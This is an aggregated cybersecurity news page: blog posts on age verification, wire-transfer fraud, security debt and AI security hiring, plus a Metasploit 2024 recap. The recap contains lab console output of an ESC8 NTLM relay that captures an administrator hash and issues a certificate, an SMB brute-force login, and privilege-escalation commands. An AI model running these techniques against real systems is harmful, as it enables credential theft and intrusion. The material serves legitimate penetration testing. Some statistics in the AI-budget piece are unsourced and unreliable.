CyberSecurity Confabulation

Posted 1 hour ago by Troy Hunt

Presently sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite

It sounds easy - "just verify people's age before they access the service" - but whether we're talking about porn in the US or Australia's incoming social media laws, the reality is way more complex than that. There's no unified approach across jurisdictions and even within a single country like Australia, the closest we've got to that is a government scheme usually intended for accessing public services. And even if there was a technically workable model, who wants to get either the gov or some big tech firm involved in their use of Instagram or Pornhub?! There's a social acceptance to be considered and not only that, circumvention of age controls is very easy when you can simply VPN into another jurisdiction and access the same website blocked in your locale. Or in the case of the adult material, I'm told (🤷‍♂️) there are many other legally operating websites in other parts of the world that are less inclined to block individuals in specific states from foreign countries. There'll be no easy solutions for this one, but it'll make for an entertaining year 😊

References

Sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite
My trusty Synology DS1512+ finally died after 12 years of faithful service (since recording this video, the new DS923+ arrived and migration was super smooth)
Pornhub addressed the age verification mandate from a bunch of US states by simply... blocking them (I wonder if there's a way around that...)
Proton VPN has seen a "massive surge" in VPN signups from the US (...there we go 🙂)
The EFF reckons there is no effective age verification method (they also downplay the negative impacts of social media on kids, which I disagree with)
The Glamira data breach made it into HIBP (link through to a Reddit thread where the company acknowledged the breach last year, no word on whether they disclosed to impacted individuals)

Shine the AI Light on Bank Wire Transfer Fraud

Posted 23 hours ago by Jane Devry

Texas-based firm Orion recently fell victim to a significant wire transfer fraud scam, which ended up costing the business $60 million at the end of the day. While many may think such scams are rare, the FBI reports that bank wire transfer fraud is a multi-billion-dollar problem that last year alone saw 84% of businesses hit with fraud attempts. It’s time for companies to take necessary action to weed out scammers before they join the list of wire transfer fraud victims.

Some recent examples of those who have been successfully scammed include the following:

Toyota lost $37 million to a business email compromise (BEC) involving invoice fraud.
Tech company Ubiquiti was scammed out of $46 million through CEO impersonation.
Scouler Co. was hit with a $17.2 million acquisition scam via CEO impersonation.
Facebook and Google were scammed for over $100 million.

Preventing bank wire transfer fraud begins with an understanding of what it is. Bank wire transfer fraud occurs when a scammer convinces a business to send funds to a fraudulent account. At face value, it might seem like identifying a scammer would be far easier than defending against other threats, such as ransomware attacks. That view is misguided. These criminals employ sophisticated tactics and exhibit behavior that’s extremely that flies below the radar of current systems.

Here is how a typical wire transfer fraud plays out:

A vendor’s mailbox is compromised, allowing an attacker to gain access to critical information that they can use to open additional accounts in the vendor’s name. On the surface, the accounts look legitimate, which is why they don’t raise a red flag with a business’s bank account validation solution. Scenarios like this shine a spotlight on why traditional validation processes are flawed.
At this point, the attacker begins communicating with the business, generally via an existing email chain. These communications are not nefarious—quite the opposite. At this point, the scammer wants to establish credibility, not raise suspicion. This step can go on for an extended period.
Once a sufficient level of trust has been established, the scammer requests a payment change, sends fraudulent invoices, and begins diverting funds to a new account. Some of these requests will communicate a sense of urgency, pressuring the victim to “think less” in favor of moving quickly.

Traditional email security tools like Secure Email Gateways (SEGs) and behavioral AI solutions, which most organizations rely on today, fall short in effectively detecting and preventing business wire transfer fraud, even when the attack comes from email. SEGs, for instance, focus on spotting threats with obvious signs of maliciousness, like phishing links. However, when fraudsters employ advanced social engineering tactics by crafting emails that appear genuine or even hijacking an employee’s email to interact normally, SEGs fail to raise any alarms. Similarly, behavioral AI tools struggle against these scams because fraudsters know how to dupe the models by exercising patience and being adept at blending in overtime, mimicking normal activity until they’re ready to strike. This allows them to slip past these defenses undetected.

How to Combat Bank Wire Transfer Fraud

So, what options do companies have if SEG filters and behavioral AI can’t stop bank wire transfer fraud? Businesses need a holistic solution beyond email security and covering the entire payment process, including detecting unusual account changes and duplicate invoices in systems like ERPs.

Email-focused tools tend to overlook ERP systems, which have a much broader scope that includes an array of business processes and data types that go far beyond email. ERP systems are also very complex and email-focused tools tend to struggle to effectively monitor and secure all aspects of an ERP system.

Stopping Fraud with AI

When it comes to stopping these scams, a team’s best weapon is AI. Today’s modern AI-based analysis systems excel where these other solutions fall short. That’s because they can monitor and assess every aspect of operations, scrutinize emails for changes in tone and writing style, identify suspicious links, and even delve into other people included in the thread. From there, the systems can generate real-time risk and trust scores, flag discrepancies or anomalies, send alerts for potentially fraudulent activities, and integrate smoothly into existing workflows for easy adoption.

These systems also provide a view of the third-party vendors that comprise your supply chain. This includes complete visibility into their management, the ability to track activities, control their permissions and system access, and enforce all key security protocols. This supply chain view is vital because these businesses that are so important to your day-to-day business are attractive targets for scammers because they often lack the same levels of security as larger enterprises, making them easy to exploit.

The high-profile cases of Toyota, Ubiquiti, and others should have most companies taking notice, as should the fact that more victims will join their ranks soon. Avoiding this dubious honor means reevaluating current strategies regarding bank wire transfer fraud. Most notably, stop counting on SEGs and behavioral AI solutions to weed the scammers in favor of a new breed of AI-powered systems that span the entire payment process to stop the scammers dead in their tracks.

The post Shine the AI Light on Bank Wire Transfer Fraud appeared first on Cybersecurity Insiders.

The Impact of Risk-Based Vulnerability Management on Security Debt

Posted 23 hours ago by Jane Devry

It’s a common challenge for today’s security teams to find themselves stuck in a never-ending cycle of identifying, prioritizing, and mitigating vulnerabilities. Oftentimes, what goes overlooked during this perpetual process is security debt. Similar to technical debt, security debt is the increasing total of unresolved vulnerabilities within an organization’s software and systems. As more vulnerabilities are identified, and the higher risk ones are prioritized for remediation, the remaining list of vulnerabilities continues to grow.

Through risk-based vulnerability management, the focus on remediating higher priority vulnerabilities sounds like a great idea. But wrapped up in the shadow of what you do fix, there is also a passive decision of what not to fix, which creates a large backlog of ‘lower’ risk vulnerabilities, which over time, can tax an organization’s resources. The standard process of discovery and response for vulnerabilities usually has organizations remediating two out of every 10 new vulnerabilities, while the remaining 80%, which pose less risk, but not none, are pushed back as the cycle repeats itself to address the latest batch of ‘critical’ vulnerabilities first.

Security Debt’s Impact

When organizations repeatedly leave lower priority vulnerabilities unaddressed, it creates security debt, which can have a few negative effects:

•Increased Attack Surface: As more vulnerabilities are left exposed, over time those vulnerabilities can increase in risk, so it broadens the attack surface, allowing attackers to exploit weak points and infiltrate systems over the long term.

•Resource Drain: Managing ongoing security debt can be a drain on resources, as security teams are in a constant state of prioritizing and patching vulnerability after vulnerability, without being able to take any proactive steps to address the sheer volume of existing vulnerabilities that continues to grow. Vulnerabilities are generally least expensive to fix the more recent they are, so a long tail of remediation can defer increased costs over time.

•Compliance Risks: Depending on the geography and industry of a business, compliance regulations may require a certain vulnerability remediation promptness. Security debt via unpatched vulnerabilities can lead to non-compliance, resulting in the loss of business, fines, legal repercussions, and damage to a brand’s reputation.

•Complex Remediation: The more security debt is accumulated, the more complex remediation becomes. This complexity only slows down the process further, including for addressing critical vulnerabilities. This decreases an organization’s resiliency to new threats.

It’s critical for organizations to understand the adverse effects of security debt and its compounding nature. The more the list of unaddressed security vulnerabilities grows, the more risk, the more complexity, and the more cost involved in trying to get that security debt back down.

Expedited vs. Efficient Remediation

Risk-based vulnerability management is a strategy that emphasizes remediating the highest risk vulnerabilities right away. The focus of this remediation strategy is to fix the most urgent items first, thus described as ‘expedited’ remediation. While it remains critical to resolve vulnerabilities most likely to result in breaches, expedited remediation can’t be the only approach an organization takes to vulnerability management.

This is where another approach called efficient remediation comes in. It’s an opportunity for security and IT teams to work together to alleviate security debt. Rather than focusing on individual items, this strategy involves looking at higher order patterns on where root cause analysis can be used to wipe away debt at the source. Additionally, this involves giving Dev and IT teams visibility into vulnerability scoring, and allowing them to evaluate the backlog of vulnerabilities that exist at their organization regularly during sprints or other development lifecycles. The most common example of this approach is “Patch Tuesday” where a single day every month eliminates a large percentage of vulnerabilities all in one go. But you can push the boundaries even further, and create high level strategies to eliminate entire groups of vulnerabilities at a time. A common next step is to group vulnerabilities by your technology stack and see which technologies are creating the most risk to your organization. You can leverage this to make business decisions about where your resources will be most effective at resolving risk.

Solving Security Debt

As businesses uncover new vulnerabilities, security debt will grow, impacting the ability to defend against attacks and keep data secure. While risk-based vulnerability management will make sure the most critical risks are addressed right away, efficient remediation must be done in tandem. Together, security, IT, and Engineering teams working side-by-side can remediate more total vulnerabilities, reducing security debt and their organization’s potential exposure to attacks.

The post The Impact of Risk-Based Vulnerability Management on Security Debt appeared first on Cybersecurity Insiders.

Researchers Uncover Nuclei Vulnerability Enabling Signature Bypass and Code Execution

Posted 2 days ago by The Hacker News

A high-severity security flaw has been disclosed in ProjectDiscovery's Nuclei, a widely-used open-source vulnerability scanner that, if successfully exploited, could allow attackers to bypass signature checks and potentially execute malicious code. Tracked as CVE-2024-43405, it carries a CVSS score of 7.4 out of a maximum of 10.0. It impacts all versions of Nuclei later than 3.0.0. "The

PLAYFULGHOST Delivered via Phishing and SEO Poisoning in Trojanized VPN Apps

Posted 2 days ago by The Hacker News

Cybersecurity researchers have flagged a new malware called PLAYFULGHOST that comes with a wide range of information-gathering features like keylogging, screen capture, audio capture, remote shell, and file transfer/execution. The backdoor, according to Google's Managed Defense team, shares functional overlaps with a known remote administration tool referred to as Gh0st RAT, which had its source

U.S. Treasury Sanctions Beijing Cybersecurity Firm for State-Backed Hacking Campaigns

Posted 2 days ago by The Hacker News

The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Friday issued sanctions against a Beijing-based cybersecurity company known as Integrity Technology Group, Incorporated for orchestrating several cyber attacks against U.S. victims. These attacks have been publicly attributed to a Chinese state-sponsored threat actor tracked as Flax Typhoon (aka Ethereal Panda or

Friday Squid Blogging: Anniversary Post

Posted 2 days ago by Bruce Schneier

I made my first squid post nineteen years ago this week. Between then and now, I posted something about squid every week (with maybe only a few exceptions). There is a lot out there about squid, even more if you count the other meanings of the word.

Blog moderation policy.

Metasploit 2024 Annual Wrap-Up

Posted 3 days ago by Spencer McIntyre

Another year has come and gone, and the Metasploit team has taken some time to review the year’s notable additions. This year saw some great new features added, Metasploit 6.4 released and a slew of new modules. We’re grateful to the community members new and old that have submitted modules and issues this year. The real privilege escalation was the privilege of working with the contributors and friends we made along the way. And so, as is tradition, let us begin the 2024 annual recap.

HTTP Relaying and ESC8

Metasploit continues to expand support for Active Directory Certificate Services AD CS attacks, also known as ESC attacks. These attacks have been popular since they were announced three years ago, and the complexity and ubiquity of enterprise AD CS setups has rendered them “gifts that keep on giving” for attackers and pen testers alike. This year, we added support for ESC8, a vulnerability in AD CS Web Enrollment service, in which authentication from a user’s SMB connection can be relayed to a Certificate Web Enrollment endpoint and used to generate a valid certificate for authentication. This means that if an attacker can coerce a user to attempt to access an SMB share, their authentication can be relayed to a certificate server for authentication. Once authenticated, the session will allow the attacker to mint certificates for any template they have permissions to access. Unlike many AD CS attacks, this is not necessarily due to a misconfiguration in a template, but is an effect of the Web Enrollment service’s use of NTLM over HTTP, which does not enable relaying protections by default.

msf6 auxiliary(server/relay/esc8) > show options

Module options (auxiliary/server/relay/esc8):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   CAINPWFILE                      no        Name of file to store Cain&Abel hashes in. Only supports NTLMv1 hashes. Can be a path.
   JOHNPWFILE                      no        Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 hashes, each
                                              of which is stored in separate files. Can also be a path.
   MODE           AUTO             yes       The issue mode. (Accepted: ALL, AUTO, QUERY_ONLY, SPECIFIC_TEMPLATE)
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RELAY_TARGETS                   yes       Target address range or CIDR identifier to relay to
   RELAY_TIMEOUT  25               yes       Seconds that the relay socket will wait for a response after the client has initiated
                                             communication.
   RPORT          80               yes       The target port (TCP)
   SMBDomain      WORKGROUP        yes       The domain name used during SMB exchange.
   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local
                                              machine or 0.0.0.0 to listen on all addresses.
   SRVPORT        445              yes       The local port to listen on.
   SRV_TIMEOUT    25               yes       Seconds that the server socket will wait for a response after the client has initiated
                                              communication.
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /certsrv/        yes       The URI for the cert server.
   VHOST                           no        HTTP server virtual host


   When MODE is SPECIFIC_TEMPLATE:

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   CERT_TEMPLATE                   no        The template to issue if MODE is SPECIFIC_TEMPLATE.


Auxiliary action:

   Name   Description
   ----   -----------
   Relay  Run SMB ESC8 relay server



View the full module info with the info, or info -d command.

msf6 auxiliary(server/relay/esc8) > set RELAY_TARGETS 10.5.132.182
RELAY_TARGETS => 10.5.132.182
msf6 auxiliary(server/relay/esc8) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/relay/esc8) > 
[*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.
[*] New request from 10.5.132.191
[*] Received request for EXAMPLE\Administrator
[*] Relaying to next target http://10.5.132.182:80/certsrv/
[+] Identity: EXAMPLE\Administrator - Successfully authenticated against relay target http://10.5.132.182:80/certsrv/
[SMB] NTLMv2-SSP Client     : 10.5.132.182
[SMB] NTLMv2-SSP Username   : EXAMPLE\Administrator
[SMB] NTLMv2-SSP Hash       : Administrator::EXAMPLE:9a0ad3b11b1b3471:b97c9d53262316974c31219cd6dd2f00:01010000000000009e0f749d1b53db013d142354bb7d5da90000000002000e004500580041004d0050004c00450001001e00570049004e002d00440052004300390048004300440049004d0041005400040016006500780061006d0070006c0065002e0063006f006d0003003600570049004e002d00440052004300390048004300440049004d00410054002e006500780061006d0070006c0065002e0063006f006d00050016006500780061006d0070006c0065002e0063006f006d00070008009e0f749d1b53db01060004000200000008003000300000000000000001000000002000007eb46f894f1cad59192724ba6164849c3e04a00c54dae36b065603553ff355c40a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000

[+] Certificate generated using template User and EXAMPLE\Administrator
[+] Certificate for EXAMPLE\Administrator using template User saved to /home/tmoose/.msf4/loot/20241220141352_default_10.5.132.182_windows.ad.cs_360378.pfx
[*] Received request for EXAMPLE\Administrator
[*] Identity: EXAMPLE\Administrator - All targets relayed to

Meterpreter’s PoolParty

In November 2024, the Metasploit Framework improved the Windows Meterpreter capabilities by including the PoolParty Injection technique to perform code injection into remote processes. The new technique functions as a replacement to the common kernel32!CreateRemoteThread technique. This increased the stealth skills of the Meterpreter agent without removing any functionality already present. Significant effort was made to implement the cleanest injection technique in a transparent manner to the user and avoid leaving any footprint in memory after a successful injection. Currently the PoolParty injection is based on the TP_DIRECT_INSERTION variant and supports code injection on 64-bit Windows 10 and newer systems. Injection to and from WoW64 processes is partially implemented due to some security restrictions. Injection is currently limited to WoW64 to x64.

LDAP Improvements

Over the past couple of years Metasploit has improved its LDAP support substantially. There are troves of data points available in Active Directory via LDAP that aid in various attack workflows. Some examples include the domain SID, the number of computers a normal user can add, kerberoastable-accounts, vulnerable ESC templates and more. To aid users in accessing this information, Metasploit has continued to make LDAP improvements this year.

Metasploit 6.4 included multiple new protocol-based session types, one of which was LDAP. The ldap_login module can be used to open an interactive LDAP session, enabling the user to take multiple actions without needing to reconnect and reauthenticate to the target server. This feature is currently disabled by default, but can be enabled using set ldap_session_type true and then restarting Metasploit. Once established, these sessions can be used to run queries from the command line, or certain auxiliary modules, such as ldap_query and ldap_esc_vulnerable_cert_finder can use the session to gather information.

In addition to the new session type, Metasploit has added support for both channel binding and signing to enable users to operate in hardened environments. Now when Metasploit authenticates to an LDAP service, it’ll automatically use signing or channel binding as applicable based on the configuration. Signing can also be controlled using the LDAP::Signing datastore option which supports three values:

disabled – never use signing, useful for verifying a server is requiring signing
auto – signing will be used when it is necessary
required – signing will always be used

Channel binding is always used when SSL is in use. Metasploit supports channel binding for both NTLM and Kerberos authentication.

Metasploit 6.4 Released

This year Metasploit 6.4 released with multiple features; including the new dns command which grants the user a high degree of control over how DNS queries should be processed, and adds support for multiple new session types (PostgreSQL, MSSQL, MySQL and SMB) with the CreateSession option:

msf6 > use scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > run rhost=192.168.123.133 username=vagrant password=vagrant CreateSession=true

[*] 192.168.123.133:445   - 192.168.123.133:445 - Starting SMB login bruteforce
[+] 192.168.123.133:445   - 192.168.123.133:445 - Success: '.\vagrant:vagrant' Administrator
[*] SMB session 2 opened (192.168.123.1:52253 -> 192.168.123.133:445) at 2024-03-19 12:07:15 +0000

Each new session type supports different capabilities such as querying databases, using the SQL/SMB session with exploit modules to gain native sessions, and exploring and manipulating remote file systems:

msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
[*] Starting interaction with 1…
SMB (192.168.123.133) > ls
[-] No active share selected. Use the shares command to view available shares, and shares -i <id> to interact with one
SMB (192.168.123.133) > shares
Shares
======
    #  Name      Type          comment
    -  ----      ----          -------
    0  ADMIN$    DISK|SPECIAL  Remote Admin
    1  C$        DISK|SPECIAL  Default share
    2  foo       DISK
    3  IPC$      IPC|SPECIAL   Remote IPC
    4  NETLOGON  DISK          Logon server share
    5  SYSVOL    DISK          Logon server share

SMB (192.168.123.133) >

Metasploit 6.4 also continued to enhance support for Kerberos workflows:

auxiliary/admin/kerberos/forge_ticket - Adding support for forging diamond and sapphire tickets, in addition to the original golden and silver techniques
post/windows/manage/kerberos_tickets - Adding support for dumping Kerberos tickets from a compromised host. This is similar functionality to what the popular Rubeus tool’s klist/dump commands do and operates entirely in memory
auxiliary/gather/windows_secrets_dump - Performing DCSync attacks on Windows domain controllers with Kerberos tickets

Module Highlights

CVE-2023-22527
Metasploit had a great start to 2024 with the addition of a module for CVE-2023-22527 in January, which was an unauthenticated RCE in Atlassian Confluence. This module was written by Metasploit’s Spencer McIntyre aka zeroSteiner. Due to an SSTI flaw that allows an OGNL expression to be evaluated, Metasploit users can obtain OS command execution in the context of the service account. On Windows the service account is NT AUTHORITY\NETWORK SERVICE which, don’t forget, can easily be escalated to NT AUTHORITY\SYSTEM using the RPCSS namedpipe impersonation technique in Meterpreter, just type: “getsystem -t 4”!

CVE-2024-21893 + CVE-2024-21887
February kept the good times rolling with an exploit chain that works against both Ivanti Connect Secure and Ivanti Policy Secure from Rapid7’s research extraordinaire, Stephen Fewer. This module combined CVE-2024-21893, a SSRF vulnerability, with a command injection vulnerability tracked as CVE-2024-21887 in order to achieve unauthenticated remote code execution in the context of the root user.

Shadow Credentials
The Shadows Credential’s module was an incredible addition to Metasploit’s Active Directory exploit capabilities. Using an account that has write permissions over another user account object, the module adds a public key credential object to the user account's msDS-KeyCredentialLink property, and then uses the existing PKINIT functionality in the get_ticket module to authenticate as that user. This module was written by Metasploit aficionado Ashley Donaldson aka smashery.

CVE-2024-3400
April saw some amazing additions to the Metasploit Framework including a very impactful exploit module for CVE-2024-3400. PAN-OS GlobalProtect Gateway and GlobalProtect Portal deployments with the default telemetry service enabled could be remotely exploited without authentication in order to gain code execution in the context of the root user. Rapid7’s very own Ryan Emmons PR’d this module and it was the only module this year to be awarded the “hotness” label in github, very cool.

CVE-2023-43177
This module, while being a great addition to the framework, also highlighted some great Rapid7 collaboration: the vulnerability was originally discovered by Rapid7’s Ryan Emmons and was written by the one and only Christophe De La Fuente. The exploit module leverages an Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability (CVE-2023-43177) to achieve unauthenticated remote code execution in the context of the Administrator user on Windows and the root user on Linux.

Progress Loadmaster sudo abuse privilege escalation
In May we saw the exploitation of Progress (Kemp) Loadmaster. The vulnerability lies in the configuration to allow sudo to auto elevate when run with certain files, but grants the non-root user bal write permissions to those files. The exploit module simply overwrites one of the files that auto-elevates with /bin/bash and runs a payload within a root-enabled /bin/bash session. This heavy hitting privilege escalation module was brought to us by Metasploit powerhouse, Brendan Watters on the 10th of May.

CVE-2024-29824
July brought some of the hottest weather to the northern hemisphere it also brought some of the hottest vulns to the Metasploit Framework with the addition of yet another fantastic exploit module from Christophe De La Feunte: The Ivanti Endpoint Manager (EPM) SQLi to RCE module. This exploit works by sending a soap envelope to the application targeting one poor unsanitized database parameter which pays the ultimate price of allowing the query to be escaped and EXEC xp_cmdshell to be run. The SQLi allows for RCE in the context of the NT Service\MSSQL$LDMSDATA user.

CVE-2024-6670
While Progress WhatsUp Gold made headlines with CVE-2024-6670, community contributor h4x-x0r made haste writing an exploit module adding yet another high impact exploit module in their rookie year of Metasploit framework contributions. The vulnerability allows an unauthenticated attacker to change the password of an existing user to an attacker-controlled value potentially giving up administrative control over the application.

CVE-2024-43917
Some kids got tricks on Halloween but Metasploit got a treat - an exploit module for a SQLi in TI WooCommerce Wishlist. Submitted by one of the hardest working Metasploit community members Valentin Lobstein aka Chocapikk, this was only one of 10 WordPress plugin modules they contributed this year. We decided to highlight this particular module because with it came an entire library of SQLi functionality specifically designed to help facilitate SQLi exploitation against WordPress plugins. We love seeing this type of reusability being added to the framework.

CVE-2024-35230
They say when it rains it pours and this is all too true when looking at the amount of vulnerabilities discovered in the Windows Kernel Streaming family of drivers this year. This module, written by Metasploit’s Jack Heysel, targeted an Access Mode Mismatch LPE in ks.sys. The vulnerable driver had hardcoded the RequestorMode parameter of a KTHREAD structure to KernelMode, which eventually allows for user supplied code to be executed with SYSTEM level privileges. This bug can be found lurking in the depths of Windows 2008 SP2 all the way up to present day Windows 11 and Server 2022.

CVE-2024-27596
It wouldn't be a proper year without some fun Wordpress vulnerabilities. The CVE-2024-27596 was quite memorable as the vulnerability was contained in a popular wp-automatic plugin. The best part was that an unauthenticated user was able to perform SQL injection and even get remote code execution by uploading a malicious module. As SQL injection allows an attacker to create an admin account, the Wordpress site is fully compromised.

CVE-2023-0386
This vulnerability was discovered last year, however, it has been added into Metasploit as a module only recently. And it's one of easy-to-exploit privilege escalations. The reason why it's so interesting is that it combines the setuid and overlay file system to run binary as root.

CVE-2024-37081
The vulnerabilities in VMWare products are always of very high interest, as these vulnerabilities can be often misused by threat actors. The CVE-2024-37081 is local privilege escalation in vCenter 8.0.0.10200 caused by misconfiguration. This misconfiguration allows the attacker to run sudo commands with preserved environmental variables such as PYTHONPATH,VMWARE_PYTHON_PATH and so.

CVE-2023-7028
When it comes to version control systems, accounts are the identity of the developer. Compromising the identity exposes the whole codebase to risk. This year, we implemented a module for CVE-2023-7028, Github account takeover. This vulnerability can be exploited without any user interaction. If the attacker provides two emails in the request for password reset - administrator's email and attacker's email - the reset code for the admin account gets sent back to both emails.

Remote Code Execution in CUPS
https://github.com/rapid7/metasploit-framework/pull/19630
https://github.com/rapid7/metasploit-framework/pull/19510

The CUPS vulnerability made big headlines this year. The reason is that CUPS exposed a UDP service, which was listening for any host to connect. Of course, CUPS service was vulnerable itself, allowing the attacker to execute remote code via specially crafted print jobs. The vulnerability allowed remote code execution on virtually any Linux machine that runs a vulnerable version of CUPS. We have implemented a module (cups_browsed_info_disclosure) for scanning for vulnerable CUPS services and also a module for exploitation (cups_ipp_remote_code_execution).

Community Stats Recap

The entire Metasploit team would like to give a big thank you to all the contributors who added content in 2024. Your ideas and contributions make this tool greater every year. We saw code additions from 62 contributors, including 39 first-time contributors.

Here are some stats for 2024:

Number of new modules: 165
Number of new bug fixes: 142
Number of new enhancements: 161
Number of new documentations: 19
Number of new payload enhancements: 4

Contributors in 2024 (ordered by count)

h00die
Chocapikk
jvoisin
smashery
h00die-gr3y
h4x-x0r (new in 2024)
nrathaus
bcoles
errorxyz
upsidedwn (new in 2024)
The-Pink-Panther (new in 2024)
Takahiro-Yoko (new in 2024)
DaveYesland (new in 2024)
NtAlexio2 (new in 2024)
heyder
KanchiMoe (new in 2024)
ide0x90
ostrichgolf (new in 2024)
jmartin-tech
jalvarezz13 (new in 2024)
ArchiMoebius (new in 2024)
molecula2788 (new in 2024)
jjoshm (new in 2024)
dotslashsuperstar (new in 2024)
double16 (new in 2024)
jlownie (new in 2024)
randomstr1ng (new in 2024)
SickMcNugget (new in 2024)
n00bhaxor
lihe07 (new in 2024)
6a6f656c
AleksaZatezalo
poupapaa (new in 2024)
Sh3llSp4wn (new in 2024)
ErikWynter
siddolo (new in 2024)
ggisz (new in 2024)
rad10
JustAnda7
pczinser (new in 2024)
james-otten
oddlittlebird (new in 2024)
szymonj99 (new in 2024)
aaryan-11-x (new in 2024)
soroshsabz (new in 2024)
dudu7615 (new in 2024)
Mathiou04 (new in 2024)
GhostlyBox (new in 2024)
Grezzo
xaitax
igomeow (new in 2024)
cn-kali-team
Adithya2357 (new in 2024)
gardnerapp
pmauduit (new in 2024)
aaronjfeingold (new in 2024)
e2002e
softScheck (new in 2024)
PizzaHat (new in 2024)
sud0Ru (new in 2024)
Fufu-btw (new in 2024)
fanqiaojun (new in 2024)

US Sanctions Chinese Cybersecurity Firm for Global Botnet Attacks

Posted 3 days ago by www.infosecurity-magazine.com

The US government said that China based firm Integrity Technology Group provided infrastructure for Flax Typhoon to attack multiple US targets

Budget boost required to tackle AI generative cyber attacks

Posted 3 days ago by Naveen Goud

As we move into the coming months, the threat landscape for businesses is evolving rapidly, particularly with the increasing use of AI to launch cyberattacks. These AI-driven attacks are proving to be highly effective, with success rates often reaching up to 80%. This precision makes them incredibly appealing to hackers, as they can not only breach systems with greater efficiency but also reap double the returns compared to traditional methods. With AI at the helm, cybercriminals can refine their tactics, making it more challenging for companies to defend against these sophisticated threats.

The Talent Shortage: A Growing Concern

In light of these advanced threats, many organizations are struggling to find the right professional talent equipped to combat AI-generated cyberattacks. The rise in complexity and scale of these attacks demands a new breed of cybersecurity professionals who possess a blend of technical prowess and an understanding of AI-driven threat vectors. Unfortunately, the pool of experts capable of mitigating these risks is still quite limited.

This talent shortage is particularly problematic for sectors that handle sensitive data or critical infrastructure, such as healthcare, finance, transportation, and manufacturing. These industries are increasingly allocating significant portions of their budgets to bolster their in-house cybersecurity teams. Not only are businesses investing in training existing staff, but they are also offering hefty compensation packages to attract professionals with the necessary skills. For the right candidate, salaries in this field can reach the millions, reflecting the high demand for top-tier cybersecurity talent.

In-Demand Skills and Roles

Among the most sought-after professionals in this arena are incident responders, fraud analysis experts, security engineers, and cybersecurity framework architects. These roles require a combination of deep technical knowledge and practical experience in handling complex cybersecurity threats, particularly those related to AI-driven risks.

As businesses ramp up their hiring efforts, skills related to Artificial Intelligence-based Threat Detection, cloud security, data governance, and quantum computing are especially in demand. AI is playing an increasingly central role in both the offense and defense of cyber battles, making AI expertise essential for cybersecurity professionals. Similarly, the rise of cloud-based infrastructures and the increasing importance of secure data handling practices mean that cloud security and data governance skills are critical for modern-day cybersecurity roles.

Freelance Markets and the Global Talent Pool

Interestingly, the demand for cybersecurity experts isn’t confined to traditional employment channels. Online freelance marketplaces, such as Fiverr, have seen a surge in job offers for cybersecurity professionals with niche skill sets. However, despite the growing demand, many of these positions remain unfilled, highlighting the ongoing skills gap in the field. This mismatch between supply and demand further emphasizes the difficulty businesses face in finding qualified professionals who can protect against AI-driven cyber threats.

While the global demand is high, businesses like Google, Microsoft, and Amazon are stepping up to meet the challenge by offering specialized training programs. These programs are designed to upskill individuals with a strong foundation in computer science and related disciplines. Additionally, there is a concerted effort to encourage greater diversity in the cybersecurity workforce. In particular, women from developing countries such as South Africa, India, Pakistan, and the UAE are being encouraged to pursue careers in cybersecurity. Many of these women possess the right educational background and skillsets to thrive in this sector, often securing lucrative job offers with impressive compensation packages and benefits.

The Rise of Quantum Computing and Data Science Roles

Another sector that has seen an uptick in demand is quantum computing. While still an emerging field, quantum computing is expected to play a significant role in both enhancing cybersecurity measures and, paradoxically, in creating new attack vectors. As a result, experts in quantum cryptography and related fields are becoming highly sought after.

Similarly, roles for data scientists and professionals working with big data analytics are also on the rise. These professionals play a crucial role in identifying patterns in vast datasets, which can be critical for detecting unusual activity or potential security breaches. With more businesses relying on data-driven decision-making, the intersection of data science and cybersecurity is becoming increasingly important.

The Road Ahead: Strategic Investments in Cybersecurity Talent

As cybersecurity threats become more sophisticated, Chief Information Officers (CIOs) and Chief Technology Officers (CTOs) are beginning to realize the immense value of having a skilled in-house cybersecurity team. By building internal expertise, businesses can respond to cyber threats more quickly and effectively, reducing reliance on external vendors or consultants.

In the near future, it is expected that companies will not only allocate more budget to hire the necessary talent but will also invest in the required hardware and software to support their cybersecurity teams. These investments will be crucial in ensuring that organizations can not only protect their data and assets but also stay ahead of emerging threats in an increasingly complex digital world.

The post Budget boost required to tackle AI generative cyber attacks appeared first on Cybersecurity Insiders.